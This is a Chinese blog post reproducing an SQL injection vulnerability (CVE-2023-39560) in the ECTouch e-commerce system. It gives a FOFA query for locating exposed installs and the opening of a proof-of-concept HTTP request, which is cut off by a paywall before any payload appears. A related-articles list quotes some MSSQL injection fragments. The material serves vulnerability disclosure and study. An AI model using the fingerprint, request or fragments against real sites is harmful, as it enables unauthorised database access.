ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)

最新推荐文章于 2024-08-22 21:20:22 发布
最新推荐文章于 2024-08-22 21:20:22 发布
阅读量845 收藏 1
点赞数 6
分类专栏: 漏洞复现 文章标签: 微信小程序 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135707912
版权
本文介绍了ECTouch电商系统的SQL注入漏洞(CVE-2023-39560),该漏洞源于insert_bought_notes函数中$id$参数未经验证,允许未认证攻击者执行SQL注入攻击,获取敏感数据。复现环境包括FOFA中找到的ectouch.css文件。修复措施包括限制互联网访问和使用WAF防护,同时建议对Referer参数进行SQL关键字过滤。
摘要由CSDN通过智能技术生成

0x01 产品简介

ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案

0x02 漏洞概述

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。

0x03 复现环境

FOFA:"themes/default/statics/css/ectouch.css"

0x04 漏洞复现

PoC

GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 5
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
漏洞复现CVE-2023-39560ECTouch V2电商系统SQL注入 附POC
失心少年
12-18 1141
ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案。MVC是一种将应用程序的逻辑层和表现层进行分离的方法。MVC分层有助于管理复杂的应用程序,因为您可以在一个时间内专门关注一个方面。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454)
nnn2188185的博客
04-10 6501
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入
【春秋云境】CVE-2023-39560 ECTouch v2 SQL注入
HMX404的博客
04-08 693
xpath语法错误extractvalue() --查询节点内容updatexml() --修改查询到的内容它们的第二个参数都要求是符合xpath语法的字符串如果不满足要求则会报错,并且将查询结果放在报错信息里–主键重复(duplicate entry)floor() --返回小于等于该值的最大整数只要是count,rand(),group by 三个连用就会造成这种主键重复报错。
微商系统 goods.php SQL注入漏洞复现
网安小白
08-22 363
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!微商城系统,又称微信商城系统,是基于微信等社交平台构建的一种小型电子商务系统。该系统融合了社交媒体的互动性和网络商城的交易功能,为商家提供了一个集商品展示、在线交易、营销推广、用户管理、数据分析等功能于一体的综合性电商平台。
常熟理工小程序sql注入
Jay
06-05 1043
这是正常的页面这个是报错的页面 报错语句:"error":"'person_type' 附近有语法错误。\r\n字符串 ')' 后的引号不完整。\r\n'person_type' 附近有语法错误。\r\n字符串 ') order by dictionary_sort asc' 后的引号不完整。"一共有5处地方有注入第一处OrderDir地方利用,/(convert(int,user))./db_name()&OrderDir=asc,1/user&OrderDir=asc,1/@@version第二处注入E
ecshop的修改版 ectouch 后台管理账号 暴露的漏洞 发送短信
09-24 3385
ecshop 后台管理账号 暴露的漏洞 发送短信 ectouch 版本中的user.php         } else { //var_dump($_LANG); //echo 'yonghu 存在'; //exit(); //login_failure   // $sms_error     "用户名或密码不正确(U:admin P:019202
Ectouch商城小程序2.7.rar
10-16
Ectouch2.7小程序后端(上传到ectouch2.7服务器端目录) wxMiniPro_Ectouch小程序前端(上传到微信小程序平台)
ECTouch_v2.7.2_SC_UTF8程序文件
06-14
最新ECTOUCH 2.72版,下载运行安装皆可用,包含微信支付,公众号设置等等
ectouch 注册会员出错 ,密码找回问题不能为空。
12-06 2023
ectouch 注册会员出错 ,密码找回问题不能为空。 wangtoro88 发表于 2015-09-10 17:59:49|只看该作者[复制链接] 2482 论坛 › ectouch-交流与讨论 › ectouch-安装使用 楼主 wangtoro88发表于 2015-9-10 17:59:49|只看
五指CMS copyfrom.php SQL注入漏洞复现(CVE-2023-52064)
0xSec
01-16 668
Wuzhicms 内容管理系统的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
OSCS开源安全周报第 59 期:Apache Superset<2.1.1 远程代码执行漏洞(CVE-2023-37941)
OSCS开源安全社区
09-11 586
OSCS 社区共收录安全漏洞个,公开漏洞值得关注的是远程代码执行漏洞( CVE-2023-37941 )、命令可绕过配置( CVE-2023-41053 )、集群密钥泄漏风险( CVE-2023-40029 )、注入漏洞( CVE-2023-39358 )。针对仓库,共监测到个不同版本的投毒组件,值得关注的是等投毒组件包窃取系统敏感信息(
ectouch2.0微商城PHP源码+微信通_2018最新
04-20
ectouch2.0微商城PHP源码+微信通_2018最新版,自己测试了可以用。
ectouch商城源码
11-21
最新ECtouch商城最新源码,已经破解了。想用下载随时可以用
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1597
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
我的第一个小项目上线啦&sql注入式攻击
周清城的博客
07-18 787
又到了晚上的玩耍时间,老板在工作室,就没敢看我的哈利波特第三集,但是玩还是要玩的, 今天看了一天的计算机图形学,补补我的计算机绘图基础,有点期末考一天复习完一科的赶脚 晚上刚好一个很厉害的师兄在这边,我也刚好买了自己的域名,云主机也早就运行好久了 知乎了一下,发现这两个东西组合在一起可以做出一些好玩的东西,那就是上线!!! 想想之前我之前做的小项目都是在本地的sql库
[ectouch 调试必备] 显示出错误信息
11-26 1873
@ini_set('display_errors',       1); 搜索 ni_set('display_errors', 然后设置为 @ini_set('display_errors',       1);
关于近期小程序测试的常见漏洞演示
weixin_48421613的博客
09-08 1712
本章节将为大家介绍一下小程序常见的漏洞的展示案例,包括支付业务逻辑漏洞、任意用户登录漏洞、水平越权漏洞等高危漏洞
针对小程序的漏洞挖掘
aobulaien001的博客
06-01 995
Burp+Fiddler+windows版本微信你也可以直接用burp+windows版微信,进行抓包,如果出现网络错误,直接用Fiddler抓包然后发给burp进行测试。这里我是直接下载的汉化版,本人英语不太好,打开Fiddler,选择工具,然后点击选项,然后在HTTPS处,勾选上。选择最右侧的操作按钮,选择将根证书导出到桌面。然后将证书导入到浏览器。手机端的话,无线网络直接设置上Fiddler的代理地址和端口,这里我设置的9999端口,然后访问x.x.x.x:9999端口,下载证书 安装即可。
CVE-2023-51767
最新发布
08-27
<<CVE-2023-51767是一个通用漏洞披露编号,它代表了一个被发现的软件安全漏洞。通常,CVE(Common Vulnerabilities and Exposures)编号用于标准化地标识安全漏洞CVE编号允许人们更方便地讨论、查找和报告安全问题,无论是为了修复漏洞还是为了防止潜在的网络攻击。 针对CVE-2023-51767的具体信息,比如该漏洞影响的产品、漏洞的性质(例如远程代码执行、SQL注入、跨站脚本等)、以及相应的安全建议等信息,通常由官方的安全机构、软件供应商或者安全研究人员在公共数据库如MITRE的CVE列表中发布。为了获取关于CVE-2023-51767的详细信息,你可以查阅官方的安全通告或访问CVE数据库进行查询。 在了解了CVE-2023-51767的信息后,建议立即采取相应的防护措施,例如应用软件供应商发布的安全补丁,更新系统或应用程序到最新版本,或是采用其他安全策略以减轻可能的风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值